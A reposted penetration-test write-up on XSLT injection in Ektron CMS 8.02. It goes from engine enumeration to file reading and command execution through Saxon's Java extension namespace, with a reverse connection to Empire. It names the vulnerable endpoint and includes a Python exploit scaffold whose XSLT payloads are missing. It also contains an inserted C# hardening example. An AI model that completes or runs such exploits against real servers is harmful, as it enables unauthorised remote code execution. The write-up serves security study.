Case Analysis of XSLT injection vulnerability

2025-03-31 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article walks through a case analysis of an XSLT injection vulnerability. The content is simple and clear and easy to follow; please read on and work through the "XSLT injection vulnerability case analysis" with the editor.

The XSLT injection vulnerability exists in the Saxon component of Ektron CMS 8.02 and can be exploited by an attacker to cause SSRF or even RCE. The researchers first found that the Metasploit exploit did not work and that the vulnerability appeared to have been patched. After further probing and information gathering, they eventually achieved RCE.

Discovering the attack surface by accident

A foreign researcher was invited to perform web penetration testing for a large organization. After basic information gathering, the web application looked fairly simple and showed no obvious weaknesses.

After further searching and testing, the researchers used dirbuster (a directory scanner) to find an interesting JavaScript file. Viewing its contents revealed the application in use: Ektron CMS 8.02.

A quick Internet search turned up vulnerability information about this CMS in a Microsoft Research advisory:

... When Ektron Web CMS's XslCompiledTransform class processes user-controlled XSL data, it may lead to code execution.

Vulnerable page:

http(s)://host/WorkArea/ContentDesigner/ekajaxtransform.aspx

This page exists on the target, so it may be vulnerable. Next, the researchers enumerated the XSLT engine on the target server by sending a POST request through Burp with an XSLT payload in the request body:

xslt=

Version:

Vendor:

Vendor URL:

Response:

Version: 1

Vendor: Microsoft

Vendor URL: http://www.microsoft.com

Trying a generic exploit

At this point the engine had been identified as the Microsoft XSLT processor. The researchers then found a Metasploit module for this attack. After setting the parameters and running exploit, nothing came back. The preliminary conclusion was that the vulnerability had been patched on the target application and could not be exploited, but instead of giving up the researchers looked at the request Metasploit had sent:

It is easy to see that it calls an interesting script:

The Microsoft XSLT processor can run C#: through script elements, C# code can be embedded in an XSLT document, alongside other out-of-band extensions.

Construct a simple SSRF probe payload:

xslt=

Response:

The use of scripts is prohibited. It can be activated through the XsltSettings.EnableScript property.

This appears to be why the Metasploit module fails: although the script is embedded in the element, scripting is disabled, so it never executes. That confirms the vulnerability has been patched and an attacker cannot obtain RCE this way. The researchers nevertheless kept digging for further vulnerability information.
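The error above comes from XsltSettings on the .NET side. The following C# example, added here and not code from the page or from Ektron, shows the loader configuration that produces that refusal, using a constructed stylesheet with a harmless script block and a hypothetical extension prefix `ext`:

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Xsl;

static class XsltHardening
{
    // Constructed sample: an XSLT with an embedded msxsl:script block, the shape the
    // Metasploit module relies on. The C# body only returns a string; "ext" is hypothetical.
    const string ScriptedXslt = @"<xsl:stylesheet version=""1.0""
  xmlns:xsl=""http://www.w3.org/1999/XSL/Transform""
  xmlns:msxsl=""urn:schemas-microsoft-com:xslt""
  xmlns:ext=""urn:example-ext"">
  <msxsl:script language=""C#"" implements-prefix=""ext"">
    public string Hello() { return ""script ran""; }
  </msxsl:script>
  <xsl:template match=""/""><xsl:value-of select=""ext:Hello()""/></xsl:template>
</xsl:stylesheet>";

    // Loader for XSLT that arrives in a request: scripts and document() off
    // (XsltSettings.Default), DTDs prohibited, and no resolver for xsl:import/include,
    // so the stylesheet can neither run code nor reach files or URLs.
    static XslCompiledTransform LoadUntrusted(string xslt)
    {
        var readerSettings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        var transform = new XslCompiledTransform();
        using (var reader = XmlReader.Create(new StringReader(xslt), readerSettings))
        {
            transform.Load(reader, XsltSettings.Default, null);
        }
        return transform;
    }

    static void Main()
    {
        try
        {
            LoadUntrusted(ScriptedXslt);
            Console.WriteLine("loaded: scripting is enabled, this is the vulnerable state");
        }
        catch (XsltException e)
        {
            // Expected: Load rejects the script block before any embedded code is compiled.
            Console.WriteLine("rejected: " + e.Message);
        }
        // The vulnerable variant differs in a single argument:
        //   transform.Load(reader, XsltSettings.TrustedXslt, new XmlUrlResolver());
    }
}
```

Saxon's reflexive Java extension functions, which the rest of this write-up turns to, are a separate mechanism governed by Saxon's own allow-external-functions configuration feature, not by XsltSettings.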

A turn for the better

While looking for material, the researchers found two research documents on XSLT injection attacks: the first, in German, a fairly comprehensive introduction to this class of attack, and the second from IOActive. After reading them, the researchers learned that Ektron CMS actually ships with several XSLT processors, one of which is Saxon. Enumerating the Saxon version:

xslt=

Version:

Vendor:

Vendor URL:

Response:

Version: 2.0

Vendor: SAXON 9.x.x.x from Saxonica

Vendor URL: http://www.saxonica.com/

The Saxon processor handles the user input normally and returns a response. From here an attacker can try to read files, enumerate information and even execute commands.

Read the file:


View the current directory:


View the current user and domain:


At this point an attacker can map the server's directory structure and read most files on it, with the exception of the SAM file, because the web application's user account lacks the required rights.

Getting a shell

The researchers' ultimate goal was command execution, but the documents they had found contained no ready-made XSLT for it. A closer look at the German document showed that the Xalan processor can execute Java code, but the Saxon examples did not declare a namespace for it.

Attempts to construct the payload returned an error.

After studying the Saxonica documentation, the researchers found that a namespace plus a few functions can be used to build an XSLT document that executes commands:

xslt=

It turned out that the Java namespace had not been declared:

xmlns:java="http://saxon.sf.net/java-type"

Without this declaration, the processor cannot resolve java:java.lang.Runtime to an external object or class.

With the payload sent, the researcher could execute arbitrary commands and connect back to the Empire framework; at this point the web penetration part ends.

Exploit script

#!/usr/bin/python
# Python 2 script (httplib, raw_input), as posted in the write-up.
# The XSLT document it posts was not preserved in the page; only the
# "xslt=" parameter name survives, so XSLT_TEMPLATE is left elided.
import httplib

target = raw_input("Enter the domain or IP address of target, e.g. www.google.com or 198.162.0.1: ")
port = raw_input("Enter port number of target, e.g. 80 or 443: ")
process = raw_input("Enter the process you wish to run, e.g. powershell.exe or cmd.exe: ")
command = raw_input("Enter command you wish to run, e.g. ping 127.0.0.1: ")


def printText(txt):
    # Print the response body line by line with surrounding whitespace removed.
    for line in txt.split('\n'):
        print line.strip()


httpServ = httplib.HTTPConnection(target, port)
httpServ.connect()

# The stylesheet text (with %s slots for process and command) is missing from the page.
XSLT_TEMPLATE = "..."
payload = "xslt=" + XSLT_TEMPLATE % (process, command)

headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
           "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}

httpServ.request('POST', '/WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers)
response = httpServ.getresponse()

if response.status == httplib.OK:
    print "Java Process Id:"
    printText(response.read())

httpServ.close()

Thank you for reading. The above is the content of "Case Analysis of XSLT injection vulnerability". After studying this article, I believe you have a deeper understanding of this XSLT injection case; the specific details still need to be verified in practice. The editor will publish more articles on related topics; you are welcome to follow.
